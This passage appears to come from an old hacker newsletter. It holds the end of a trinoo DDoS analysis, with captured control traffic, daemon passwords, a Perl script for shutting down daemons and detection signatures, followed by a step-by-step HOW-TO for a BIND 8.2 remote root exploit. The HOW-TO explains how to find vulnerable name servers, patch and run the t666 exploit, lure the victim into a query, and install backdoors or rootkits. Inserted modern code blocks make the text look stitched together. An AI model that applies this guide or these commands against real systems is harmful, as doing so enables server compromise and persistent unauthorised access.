      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        62 65 74 61 61 6c 6d 6f    73 74 64 6f 6e 65 0d 0a    betaalmostdone..
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 20 76    31 2e 30 37 64 32 2b 66    trinoo v1.07d2+f
        33 2b 63 2e 2e 5b 72 70    6d 38 64 2f 63 62 34 53    3+c..[rpm8d/cb4S
        78 2f 5d 0a 0a 0a                                     x/]...          
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        62 63 61 73 74 0d 0a                                  bcast..         
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        4c 69 73 74 69 6e 67 20    42 63 61 73 74 73 2e 0a    Listing Bcasts..
        0a                                                    .               
      ###
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        31 39 32 2e 31 36 38 2e    30 2e 31 2e 20 20 20 0a    192.168.0.1.
        0a 45 6e 64 2e 20 31 20    42 63 61 73 74 73 20 74    .End. 1 Bcasts t
        6f 74 61 6c 2e 0a 74 72    69 6e 6f 6f 3e 20          otal..trinoo>   
      ##
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        6d 74 69 6d 65 72 20 31    30 30 30 0d 0a             mtimer 1000..     
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        6d 74 69 6d 65 72 3a 20    53 65 74 74 69 6e 67 20    mtimer: Setting 
        74 69 6d 65 72 20 6f 6e    20 62 63 61 73 74 20 74    timer on bcast t
        6f 20 31 30 30 30 2e 0a                               o 1000..          
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        62 62 62 20 6c 34 34 61    64 73 6c 20 31 30 30 30    bbb l44adsl 1000
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        6d 74 69 6d 65 72 3a 20    53 65 74 74 69 6e 67 20    mtimer: Setting 
        74 69 6d 65 72 20 6f 6e    20 62 63 61 73 74 20 74    timer on bcast t
        6f 20 31 30 30 30 2e 0a                               o 1000..          
      ###
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        6d 73 69 7a 65 20 33 32    30 30 30 0d 0a             msize 32000..     
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        72 73 7a 20 33 32 30 30    30                         rsz 32000         
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        64 6f 73 20 32 31 36 2e    31 36 30 2e 58 58 2e 59    dos 216.160.XX.Y
        59 0d 0a                                              Y..             
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        44 6f 53 3a 20 50 61 63    6b 65 74 69 6e 67 20 32    DoS: Packeting 2
        31 36 2e 31 36 30 2e 58    58 2e 59 59 2e 0a          16.160.XX.YY..  
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        61 61 61 20 6c 34 34 61    64 73 6c 20 32 31 36 2e    aaa l44adsl 216.
        31 36 30 2e 58 58 2e 59    59                         160.XX.YY       
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ##
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        71 75 69 74 0d 0a                                     quit..          
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
        62 79 65 20 62 79 65 2e    0a                         bye bye..       
      ###
      T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
        62 65 74 61 61 6c 6d 6f    73 74 64 6f 6e 65 0d 0a    betaalmostdone..
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        74 72 69 6e 6f 6f 20 76    31 2e 30 37 64 32 2b 66    trinoo v1.07d2+f
        33 2b 63 2e 2e 5b 72 70    6d 38 64 2f 63 62 34 53    3+c..[rpm8d/cb4S
        78 2f 5d 0a 0a 0a                                     x/]...          
      ###
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        74 72 69 6e 6f 6f 3e 20                               trinoo>         
      ###
      T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
        6d 70 69 6e 67 0d 0a                                  mping..         
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        6d 70 69 6e 67 3a 20 53    65 6e 64 69 6e 67 20 61    mping: Sending a
        20 50 49 4e 47 20 74 6f    20 65 76 65 72 79 20 42     PING to every B
        63 61 73 74 73 2e 0a                                  casts..         
      #
      U 10.0.0.1:1025 -> 192.168.0.1:27444
        70 6e 67 20 6c 34 34 61    64 73 6c                   png l44adsl     
      ##
      U 192.168.0.1:32894 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
      ##
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        74 72 69 6e 6f 6f 3e 20    50 4f 4e 47 20 31 20 52    trinoo> PONG 1 R
        65 63 65 69 76 65 64 20    66 72 6f 6d 20 31 39 32    eceived from 192
        2e 31 36 38 2e 30 2e 31    0a                         .168.0.1
      ##
      T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
        71 75 69 74 0d 0a                                     quit..          
      #
      T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
        62 79 65 20 62 79 65 2e    0a                         bye bye..       
      ------------------------------------------------------------------------------
      
      
      Appendix B - trinot script
      --------------------------
      
      -------------------------------  cut here  -----------------------------------
      #!/usr/bin/perl -w
      #
      # trinot v. 1.1
      # By Dave Dittrich <dittrich@cac.washington.edu>
      # 
      # Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
      # to all their masters, exit, etc.  Using this program (and knowledge
      # of the proper daemon password), you can affect trinoo daemons
      # externally and monitor packets to verify if the daemons are up,
      # expose their masters, or shut them down.
      #
      # Needs Net::RawIP (http://quake.skif.net/RawIP)
      # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
      #
      # Example: ./trinot host1 [host2 [...]]
      #          ./trinot -S host
      #          ./trinot -p password -P host
      #
      # (This code was hacked from the "macof" program, written by
      # Ian Vitek <ian.vitek@infosec.se>)
      
      require 'getopts.pl';
      use Net::RawIP;
      
      $a = new Net::RawIP({udp => {}});
      chop($hostname = `hostname`);
      
      Getopts('PSDp:f:s:d:l:i:vh');
      die "usage: $0 [options] host1 [host2 [...]]\
      \t-P\t\t\tSend \"png\" command\
      \t-S\t\t\tSend \"shi\" command\
      \t-D\t\t\tSend \"d1e\" command (default)\
      \t-p password\t\t(default:\"l44adsl\")
      \t-f from_host\t\t(default:$hostname)\
      \t-s src_port\t\t(default:random)\
      \t-d dest_port\t\t(default:27444)\
      \t-l ipfile\t\tSend to IP addresses in ipfile\
      \t-i interface \t\tSet sending interface (default:eth0)\
      \t-v\t\t\tVerbose\
      \t-h This help\n" unless ( !$opt_h );
      
      # set default values
      $opt_i = ($opt_i) ? $opt_i : "eth0";
      $s_port = ($opt_s) ? $opt_s : int rand 65535;
      $d_port = ($opt_d) ? $opt_d : 27444;
      $pass = ($opt_p) ? $opt_p : "l44adsl";
      
      # choose network card
      if($opt_e) {
        $a->ethnew($opt_i, dest => $opt_e);
      } else {
        $a->ethnew($opt_i);
      }
      
      $cmd = ($opt_P) ? "png $pass" :
             ($opt_S) ? "shi $pass" :
             ($opt_D) ? "d1e $pass" :
             "d1e $pass";
      $s_host = ($opt_f) ? $opt_f : $hostname;
      
      if ($opt_l) {
        open(I,"<$opt_l") || die "could not open file: '$opt_l'";
        while (<I>) {
          chop;
          push(@ARGV,$_);
        }
        close(I);
      }
      
      foreach $d_host (@ARGV) {
        $a->set({ip => {saddr => $s_host, daddr => $d_host},
                 udp => {source => $s_port, dest => $d_port, data => $cmd}
                });
        print "sending '$cmd' to $d_host\n" if $opt_v;
        $a->send;
      }
      
      exit(0);
      -------------------------------  cut here  -----------------------------------
      
      
      Appendix C - References
      -----------------------
      
      TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary
      R. Wright., Addison-Wesley.
      
      lsof:
              ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
      
      tcpdump:
      
              ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
      
      hunt:
              http://www.cri.cz/kra/index.html
      
      sniffit:
              http://sniffit.rug.ac.be/sniffit/sniffit.html
      
      ngrep:
              http://www.packetfactory.net/ngrep/
      
      loki client/server:
              Phrack Magazine, Volume Seven, Issue Forty-Nine,
              File 06 of 16, [ Project Loki ]
              http://www.phrack.com/search.phtml?view&article=p49-6
      
              Phrack Magazine  Volume 7, Issue 51 September 01, 1997,
              article 06 of 17 [ L O K I 2   (the implementation) ]
              http://www.phrack.com/search.phtml?view&article=p51-6
      
      LibNet:
              http://www.packetfactory.net/libnet/
      
      Net::RawIP:
              http://quake.skif.net/RawIP
      
      crack:
              http://www.crypto.dircon.co.uk/
      
      Password cracking utilities:
              http://packetstorm.securify.com/Crackers/
      
      targa.c:
              http://packetstorm.securify.com/exploits/DoS/targa.c
      
      
      
      Appendix D - Abbreviated report of actual trinoo attack.
      ------------------------------------------------------
      
      The following is an abbreviated version of the initial report sent out by
      Susan Levy Haskell of the University of Minnesota.  This report,
      which only concerns a small time span in the three day attack, showed
      227 unique attacking systems, 114 of which were at Internet 2 sites.
      (The actual list of attacking systems, all of which are also root
      compromised victims in their own right, has been removed. A complete
      report of all unique attacking IP addresses over the three day period
      is not available.)
      
      Just to show what a large trinoo network could do, consider that a file
      (named "owned.log") containing 888 IP addresses was found in the same location
      as the trinoo source code analyzed here (which is assumed to be the same
      code as that used for the attack).  Another file in that directory
      (named "216") contains addresses of 10549 systems on 216.0.0.0/8
      netblocks, and is assumed to be a list of potential targets for
      compromise and trinoo daemon/master installation.  Rumors on Usenet
      newsgroups and Slashdot put the number of systems controlled by this
      group in the 3000+ range.
      
      ----------------------------------------------------------------------------
      Hello:
      
      This is a notification that a system at your site apparently was used in
      a large-scale UDP flood on a system at the University of Minnesota.  The
      hosts below have been involved in a series of escalating large-scale
      denials-of-service that are flooding the University of Minnesota off the
      internet.  They are periodic, but expanding in the number of hosts used
      to attack.
      
      We would like to hear about it if you can confirm whether your system(s)
      were used.  We're also *very* interested in any information about this
      tool (since it appears to be new, and quite effective).  Thus far, all
      hosts used in this attack appear to have been Solaris 2.x systems that
      were compromised using the recently-announced rpc.cmsd exploits (see
      http://www.cert.org/advisories/CA-99-08-cmsd.html for details).
      
      The following are lists of hosts apparently used, and the period of use.
      We're certain about the timestamps--they're in CDT (-500)--but as with 
      all such floods, they ramp up and tail off.  Since we're getting data in 
      ten-minute slices, the times are approximate.  
      
      The floods use unforged source IPs and consistent UDP source-ports.  The
      destination ports are random, aimed at 160.94.196.192.
      The packets are 32-byte UDP (and each flow represents many packets).
      
      I've included profile information below, rather than log excerpts,
      because these run to many GB.  If you would like Cisco net-flow excerpts
      to demonstrate the behavior, please reply to this message & ask.
      
      All attacks have been launched at 160.94.196.192 (irc2.tc.umn.edu).
      And, as I mentioned, all times are in CDT (-500) from an ntp-slaved log
      host (for the ten-minute segments).
      
      Thank you.
      
      -susan
      --
      Susan B. Levy Haskell   /  sblh@nts.umn.edu  /   voice: (612) 626-8639
      Security Incident Response Coordinator             fax: (612) 626-1002  
      Networking and Telecommunications Services,    University of Minnesota
      *** To report a security incident in progress, call (612) 625-0006 ***
      =================================================
      
      
      Appendix E - Further methods of detecting trinoo
      ------------------------------------------------
      
      Authors: David Brumley <dbrumley@stanford.edu>
               David Dittrich <dittrich@cac.washington.edu>
               George Weaver <gmw@psu.edu>
      
      Detecting Trinoo
      
      Currently Trinoo has several signatures that allow it to be detected from
      IP flow records.  
      
      Trinoo Daemon (ns.c) -
      1. The trinoo daemon by default listens to UDP port 27444
      2. All communication with the trinoo daemon must have the string l44
      (ell 44).
      3. The SYN flood mechanism picks the destination port via the following
      algorithm:
              to.syn_port = htons(rand() % 65534)
      
         Several observations can be made:
              a. randomize()/srandom() is never called, so the destination port
                 will always fit the following algorithm:
                 SYN packet 1 has destination port x
                 SYN packet 2 has destination port y as defined by
                       srandom(x); y = rand();
                 SYN packet 3 has destination port z as defined by
                       srandom(y); z = rand();
              b. Since the port is a result of modulus 65534, destination port 0
                 will show up, while destination port 65535 will not.
      
      IDS detection of daemon:
      1. Look for UDP connections to destination port 27444. This is indicative
      of the control session.
      2. The string l44 will determine with a large probability that the packet
      is part of a trinoo control session.
      3. Running trinoo DoS attacks (SYN Floods) can be identified by the
      algorithm given in 3 above.  In addition, if you can catch the first SYN,
      it will *always* be the result of srand(1); rand();. On one author's
      laptop, an example sequence of destination ports would be:
              32540
              48264
              58208
              56084
              46021
              37263
              6890
              38941
              17766
              40714
      
      Although this doesn't stop the Denial of Service, it will say with some
      probability this is a trinoo attack, and you should start looking for a
      master!
      
      Detecting the trinoo daemon on your network:
      1. Trinoo daemons can be indexed by a master by sending a png command.
      Live daemons will respond with a PONG. The original author probably added
      this so the master can see which daemons are still alive.  You can scan a
      network with the attached program for anything that responds appropriately
      (which chances are is a trinoo daemon).
      
      Trinoo Server (master.c) -
      The network communications that are indicative of a trinoo server are:
      1. Sending UDP packets with destination port 27444
      2. UDP packets as described above with the string l44adsl (ell 44 a d s
      ell)
      3. A server will bind to port 27665
      
      IDS detecting the trinoo server:
      1. Look for flows with protocol type 17 (UDP)
      2. TCP connections (protocol type 6) to destination port 27665 (the trinoo
      server)
      
      Detecting the Trinoo server on your network:
      1. The server password hasn't changed (to the best of the authors'
      knowledge), nor has the port it listens to.  Possible trinoo masters can
      be detected by using a tool like nmap to find hosts listening to port
      27665, i.e.
              nmap -PI -sT -p 27665 -m logfile "you.subnet.*.*"
      After a list of possible servers has been compiled, automated login can be
      used for positive identification.  If you wish to script the automated
      login, try netcat (nc on most systems), i.e.
              echo "betaalmostdone" | nc <IP> 27665
      
      NOTE:
      Your mileage may vary with the random number prediction since it's very
      host specific - what does rand() really return?  Consult your
      documentation.
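
      The port and string signatures listed in this appendix and in the ngrep
      discussion earlier (UDP 27444 carrying "l44", UDP 31335 carrying
      "*HELLO*" or "PONG", TCP 27665) can be applied to a saved "ngrep -x"
      capture.  This is an added example, not code from the authors; the
      sample capture is constructed in the style of Appendix A, and the parser
      assumes the fixed-column "ngrep -x" layout shown there.

```python
import re

# Default values from the analysis; a modified build may change all of them.
DAEMON_UDP = 27444   # master -> daemon commands, carrying the "l44..." password
MASTER_UDP = 31335   # daemon -> master "*HELLO*" / "PONG"
MASTER_TCP = 27665   # attacker -> master console

HEADER = re.compile(r"^([UT]) ([\d.]+):(\d+) -> ([\d.]+):(\d+)")
HEX_BYTE = re.compile(r"^[0-9a-fA-F]{2}$")
HEX_COLS = 50        # "ngrep -x" prints up to 16 hex bytes in 50 columns

# Constructed capture in "ngrep -x" layout (addresses as used in Appendix A).
SAMPLE = """
interface: eth0 (192.168.0.200/255.255.255.0)
filter: ip and ( udp or tcp )
#
U 192.168.0.1:32887 -> 10.0.0.1:31335
  2a 48 45 4c 4c 4f 2a                                  *HELLO*
##
U 10.0.0.1:1025 -> 192.168.0.1:27444
  70 6e 67 20 6c 34 34 61    64 73 6c                   png l44adsl
#
U 192.168.0.1:32894 -> 10.0.0.1:31335
  50 4f 4e 47                                           PONG
###
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  62 63 61 73 74 0d 0a                                  bcast..
#
U 192.168.0.9:40000 -> 192.168.0.10:9999
  61 64 20 34 34                                        ad 44
"""


def parse_ngrep(text):
    """Return a list of (proto, src, sport, dst, dport, payload) tuples."""
    packets = []
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            packets.append([m.group(1), m.group(2), int(m.group(3)),
                            m.group(4), int(m.group(5)), bytearray()])
            continue
        # Trust only the fixed-width hex area: the ASCII column on the right
        # can itself look like hex (see the "ad 44" payload in the sample).
        tokens = line[:HEX_COLS].split()
        if packets and tokens and all(HEX_BYTE.match(t) for t in tokens):
            packets[-1][5].extend(int(t, 16) for t in tokens)
    return [tuple(p[:5]) + (bytes(p[5]),) for p in packets]


def classify(pkt):
    """Map one packet to a trinoo role signature, or None if nothing matches."""
    proto, _src, sport, _dst, dport, payload = pkt
    if proto == "U" and dport == DAEMON_UDP and b"l44" in payload:
        return "master->daemon"
    if proto == "U" and dport == MASTER_UDP and payload in (b"*HELLO*", b"PONG"):
        return "daemon->master"
    if proto == "T" and MASTER_TCP in (sport, dport):
        return "console"
    return None


def suspects(text):
    """Return (suspected masters, suspected daemons) seen in a capture."""
    masters, daemons = set(), set()
    for pkt in parse_ngrep(text):
        _proto, src, _sport, dst, dport, _payload = pkt
        kind = classify(pkt)
        if kind == "master->daemon":
            masters.add(src)
            daemons.add(dst)
        elif kind == "daemon->master":
            daemons.add(src)
            masters.add(dst)
        elif kind == "console":
            masters.add(dst if dport == MASTER_TCP else src)
    return sorted(masters), sorted(daemons)


if __name__ == "__main__":
    masters, daemons = suspects(SAMPLE)
    print("suspected masters:", masters)
    print("suspected daemons:", daemons)
```

      Port-only matches on 27665/tcp are weak evidence on their own; the
      payload checks on the two UDP ports are what tie a host to trinoo.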
      
      @HWA
      
308.0 [IND] Remote root exploit HOW-TO by E-mind
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
            
          +-------------------------------------------------------+
          |BIND 8.2 - 8.2.2 *Remote root Exploit How-To* by E-Mind|
          +-------------------------------------------------------+
      
      
      (A) What is a DNS?
      
            1. How do I query a DNS?
            2. How do I find a vulnerable DNS?
      
      
      (B) How do I edit DNS entries?
      
            1. How do I find a Zone file?
            2. How do I edit a Zone file?
      
      
      (C) How do I exploit a vulnerable machine
      
            1. What do I need to obtain before I could use the exploit?
            2. What is the theory behind the exploit?
            3. Where do I get the exploit from?
            4. Why should I patch the exploit?
            5. How do I patch the exploit?
            6. How do I compile the exploit?
            7. How do I run the exploit?
            8. How do I make the vulnerable server make a query to my ip?
            9. What should I do before I leave the shell?
      
      
      (D) Who should be credited for this HowTo?
      
            1. Who is the person that motivated me into writing this?
            2. Who am I?
            3. Can I distribute/change this HowTo?
            4. Final Credits and Greets :)
      
      
      Section A - What is a DNS?
      --------------------------
      
         A DNS - Domain Name Server, is used to convert host names to IP addresses
         and IP addresses to host names.
         for example: www.infoseek.com = 204.162.96.173
      
            1. How do I query a DNS?
               First of all, you should probably know that when you configure your
               TCP/IP and wish to use hostnames in your web browser to get to a web
               site, instead of typing the IP address of that site, you would need
               to configure a DNS server. You will get your DNS server IP address
               from your ISP. To make queries to the DNS server, Unix systems
               (and NT) have a tool called "nslookup". The syntax of that tool is:
               $nslookup <hostname>
               or
               $nslookup <ip>
               A properly configured DNS server contains two "lists" for a domain
               called the Zone files. One zone file is used for hostname to IP
               resolution, and the other is used for reverse lookup or IP to Hostname
               resolution. "nslookup" can be used in an interactive way, this is the
               way we will work with, as it is more powerful. Just type nslookup at
               the shell and press enter. You will get a ">" prompt, from which you
               can start typing in IP addresses and hostnames. There are some
               commands in nslookup which we will discuss later in this howto that
               will allow you to get some more information.
      
            2. How do I find vulnerable systems?
               Remember, we will exploit Name Servers.
               We first need to find out the version of the DNS service that runs on
               a remote host. As well, we will need to know the Operating System, but
               there are many HowTo`s on that. We will use a tool called "dig", which
               is available on most Unix systems. The syntax looks like this:
               $dig @<victim_ip> version.bind chaos txt | grep \"8
               look at the output. If you see: 8.2 or 8.2.1 or 8.2.2 then it is
               vulnerable. If you see 8.2.2P2 - P5, it is not.
               If you don't get an output and you just see your terminal stuck, it
               means that the DNS admin has probably edited the source so that the
               server won't give you this information. IT COULD BE VULNERABLE.
      
      
      Section B - How do I edit DNS entries?
      --------------------------------------
      
         The first thing you should know is, DNS is only text files, and entries are
         added or changed by editing those text files and restarting the service.
         The main file that controls the DNS service is /etc/named.conf or
         /etc/named.boot. If /etc/named.conf exists, that is the file you should be
         working with.
      
            1. How do I find a Zone file?
               As I said earlier, a properly configured DNS has two "lists" or zone
               files for each domain it serves.
               You will need to edit that zone file to change or add entries to that
               domain. A domain is for example, infoseek.com, and a hostname is www,
               the FQDN is www.infoseek.com. FQDN stands for Fully Qualified Domain
               Name. To find the zone file for FQDN to IP for infoseek.com domain,
               we should first query our DNS server to tell us what is the primary
               DNS for infoseek.com. This is how it is done:
               
               $nslookup
               Default Server:  xxxxxx.xxxxxxx.xx.xx
               Address:  xxx.xx.xx.xx
               >set q=ns<ENTER>
               >infoseek.com<ENTER>
               >infoseek.com      nameserver = NS-UU.infoseek.com
               >NS-UU.infoseek.com    internet address = 198.5.208.3
      
               As you can see, now we have the ip address of the name server of
               infoseek.com. Let us suppose that we are root there.
               We SSH to their DNS, and locate the file /etc/named.conf
               We view the file and we see at the top an options section.
               there is a line there that says:
               directory "/var/named"
               This means, that the zone files will sit in /var/named.
               We further look down the file and we see some zone sections,
               We see a zone for infoseek.com which looks like:
      
               zone "infoseek.com"{
                    type master;
                    file "infoseek.com.zone";
               };
      
               As we can understand now, the zone file is:
               /var/named/infoseek.com.zone, and that is the file which we should
               edit.
      
            2. How do I edit a Zone file?
               First, let's take a look at that zone file.
               We see at the top a SOA record, which probably looks to you like a
               block of garbage text at the top.
               then, we see something like:
               
               @                 IN     NS      NS-UU.infoseek.com.
               www               IN     A       204.192.96.173
               ftp               IN     CNAME   corp-bbn
               corp-bbn          IN     A       204.192.96.2
               .
               .
               .
               
               As we can see, there are several types of records, for our exploit to
               work, we only need to focus on one record, which is NS.
               An A record is the typical Hostname to IP record type.
               CNAME is a Canonical Name, which is an Alias to an A record.
               A PTR record is a Pointer record, which is the opposite of A, it points
               IP addresses to FQDN`s. PTR`s are used in the "other" zone file.
               We will not discuss about it here but it is recommended that you read
               about DNS, there are many good books about DNS out there, read one.
               An NS record is a Name Server record type which says what is the Name
               Server for a specific domain or sub-domain.
               As you might have noticed, the NS record NS-UU.infoseek.com ends with
               a ".".
               This is because we specified the FQDN and not the hostname.
               When the period is omitted, the domain name is added after the
               hostname and if we were to omit the last period, it would be like we
               have said:
               NS-UU.infoseek.com.infoseek.com.
               So instead of:
      
               www                    IN      A       204.192.96.173
               we could write:
               www.infoseek.com.      IN      A       204.192.96.173
               Which is the same thing.
               
               For our exploit to work, we will need to add a sub-domain to a name
               server on the net. So let's again suppose that we are root at
               NS-UU.infoseek.com.
               
               How do we add a sub-domain?
               We just need to add another NS record.
      
               subdomain              IN      NS      hacker.box.com.
      
               this means that the name server of the domain subdomain.infoseek.com
               would be hacker.box.com.
               hacker.box.com needs to be resolved to your machine's IP address, so
               enter your FQDN instead.
               Now, we need to restart the name server so the changes will take
               effect.
               initiate the following command:
               
               #/usr/sbin/ndc restart<ENTER>
               new pid is 24654
               #
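
               For the operator of a name server, the trailing-dot rule and the
               added NS record described above can both be checked in the zone
               file itself. The following is an added example, not part of the
               original HowTo: zone_fqdn, foreign_delegations and the "lab" record
               are hypothetical, and it assumes one "owner IN type rdata" record
               per line with no TTL column or $ORIGIN directive.

```shell
#!/bin/sh
# Added example (not from the HowTo). Assumes records laid out as
#   owner IN type rdata
# one per line, like the zone file excerpt shown above.

# zone_fqdn NAME ORIGIN: expand a zone-file name the way the text describes.
zone_fqdn() {
    case $1 in
        @)  printf '%s\n' "$2" ;;      # @ stands for the zone origin itself
        *.) printf '%s\n' "$1" ;;      # trailing dot: already fully qualified
        *)  printf '%s\n' "$1.$2" ;;   # relative name: the origin is appended
    esac
}

# foreign_delegations ZONEFILE ORIGIN: print "owner target" for every NS record
# that delegates a name below the zone apex to a server outside the zone.
# ORIGIN is given with its trailing dot, for example infoseek.com.
foreign_delegations() {
    awk -v origin="$2" '
        function fqdn(n) {
            if (n == "@") return origin
            if (n ~ /\.$/) return n
            return n "." origin
        }
        function in_zone(n,    suffix) {
            n = tolower(n)
            suffix = "." tolower(origin)
            if (n == tolower(origin)) return 1
            if (length(n) <= length(suffix)) return 0
            return substr(n, length(n) - length(suffix) + 1) == suffix
        }
        /^[ \t]*;/ || NF < 4 { next }          # comments and filler lines
        $2 == "IN" && $3 == "NS" {
            owner = fqdn($1)
            target = fqdn($4)
            # The apex NS records are the zone itself, not a delegation.
            if (tolower(owner) != tolower(origin) && !in_zone(target))
                print owner, target
        }
    ' "$1"
}

# write_sample_zone FILE: the records quoted in the text plus one constructed
# in-zone delegation ("lab") that must not be reported.
write_sample_zone() {
    cat > "$1" <<'EOF'
; constructed sample zone for infoseek.com.
@                 IN     NS      NS-UU.infoseek.com.
www               IN     A       204.192.96.173
ftp               IN     CNAME   corp-bbn
corp-bbn          IN     A       204.192.96.2
lab               IN     NS      ns.lab
subdomain         IN     NS      hacker.box.com.
EOF
}

tmp_zone=$(mktemp)
write_sample_zone "$tmp_zone"
zone_fqdn NS-UU.infoseek.com infoseek.com.
foreign_delegations "$tmp_zone" infoseek.com.
rm -f "$tmp_zone"
```

               Run against a copy of the zone file after any change; a delegation
               that nobody requested shows up as one line of output.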
      
      
      Section C - How do I exploit a vulnerable machine
      -------------------------------------------------
      
            1. What do I need to obtain before I could use the exploit?
               First of all, 3 brain cells. ;p
               You will also need root privileges on a PRIMARY Name Server on the
               Internet which is Authoritative for a Domain on the net.
               Also, you will need a machine from which you will run the exploit.
               As for the DNS requirement, you could also ask someone that has root
               privileges on such a DNS, to edit the zone files for you.
      
            2. What is the theory behind the exploit?
               The exploit uses a Buffer Overflow in BIND versions 8.2 - 8.2.2 to
               gain a remote root shell.
               The exploit binds to port 53 on the local machine, and acts as a DNS
               server. When someone queries it, it will send a large NXT record that
               contains code that will exploit the remote BIND server,
               provided that it is a vulnerable machine.
               To get more information on how Buffer Overflows work, *PLEASE* read
               Aleph One`s excellent article:
               
               Phrack 49 Article 14 - Smashing The Stack For Fun And Profit.
               URL: http://www.phrack.com/search.phtml?view&article=p49-14
      
            3. Where do I get the exploit from?
               http://www.hack.co.za/daem0n/named/t666.c
      
            4. Why should I patch the exploit?
               You might have heard that one needs to patch the exploit to make it
               work. This is because ADM thought only elite hax0rs should use their
               exploit and so, they planted a small "bug" in the code.
               What they actually did, is change the shell codes so that instead of
               running /bin/sh, the exploit will run /adm/sh.
      
            5. How do I patch the exploit?
               As you may see, only a small change needs to be done in the code.
      
               / = 2F(HEX)   ===>  / = 2F(HEX)
               a = 61(HEX)   ===>  b = 62(HEX)
               d = 64(HEX)   ===>  i = 69(HEX)
               m = 6D(HEX)   ===>  n = 6E(HEX)
               / = 2F(HEX)   ===>  / = 2F(HEX)
      
               So, all we need to do, is search the source code for
               0x2f,0x61,0x64,0x6d,0x2f and replace it with 0x2f,0x62,0x69,0x6e,0x2f
      
               Done.
      
            6. How do I compile the exploit?
               As always:
               $gcc t666.c -o t666<ENTER>
               $
      
            7. How do I run the exploit?
               $su<ENTER>
               Password:<password><ENTER>
               #./t666 1<ENTER>
               
               Now the exploit is bound to port 53 (if you run a DNS server on the
               machine you want to run the exploit on, you must first kill the name
               server, use: #killall -9 named)
               The exploit is now waiting for queries, the second someone will query
               your exploit machine you will get an output:
               Received request from xxx.xx.xx.xx:1025 for xxx.xxxxxxxxx.xx.xx type=1
               If it was a DNS server, it would enter a proxy loop, and if it is a
               vulnerable server, running on Linux Redhat 6.x    - named 8.2/8.2.1
               (from rpm) (this is because we chose architecture 1, type ./t666
               without arguments and you will get a list of the architectures that
               the exploit will work on, I have tried it on Redhat linux only, so
               don't ask me why solaris doesn't work, I don't have a solaris to test
               it on, nor do I have the time to put more effort on this exploit.)
               You will get a remote root shell.
      
            8. How do I make the vulnerable server make a query to my ip?
               This is very easy now, once you have added a subdomain in a name
               server on the net and made yourself its DNS, the only thing left to
               do, is query the vulnerable server for a host inside the added
               subdomain.
      
               $nslookup
               >server <victim><ENTER>
               >www.subdomain.infoseek.com<ENTER>
      
               What will happen, is the server will ask, in this case
               NS-UU.infoseek.com for the IP of www.subdomain.infoseek.com.
               NS-UU.infoseek.com will start searching and will get to subdomain,
               because subdomain has its OWN NS record, it will tell <victim> that
               hacker.box.com. (your hostname in this case) is the Authoritative Name
               Server for subdomain.infoseek.com. Now, what will happen, is that
               <victim> will query hacker.box.com, for the ip address of
               www.subdomain.infoseek.com. BOOM! :)
      
            9. What should I do before I leave the shell?
               When you exploit BIND, it will crash named, so you need to add some
               kind of a back door so you could log back in and restart it.
               *DO NOT TRY TO RESTART IT WITHIN THE SHELL.*
               There are plenty of trojans and rootkits you could install on the
               server, I leave that to you.
      
      
      Section D - Who should be credited for this HowTo?
      --------------------------------------------------
      
            1. who is the person that motivated me into writing this?
               That person is none other than gov-boi, he operates the great site
               www.hack.co.za. Without him, this How-To would have never been written!
               Thanks Gov-Boi :)
      
            2. whoami?
               I am E-Mind, you can find me on IRC (EFNet)
               I am not giving away my E-Mail, and will not answer stupid questions.
               I think I have provided everything you need to RUN the exploit in this How-To.
               If not, and if you find errors, PLEASE /msg me on IRC.
      
            3. can I distribute/change this HowTo?
               I take no responsibility for your actions.
               You are free to do whatever you want with this file
      
               *AS LONG AS "SECTION D" REMAINS UNTOUCHED*
      
            4. Final Credits and Greets :)
      
               Credits:
               
               Gov-Boi - Keep up the good work man! ;p
               
               Aleph One - no other article out there explains buffer overflows
                           better than yours!
               
               ADM - for writing this cool exploit.
      
      
               Greetz:
      
               #myth!, #!glich, #972, #darknet, #feed-the-goats -  `sup guyz? ;]
      
      
      EOF

309.0 [IND] Paper: Armoring Linux by Lance Spitzner (July 28th 2000)
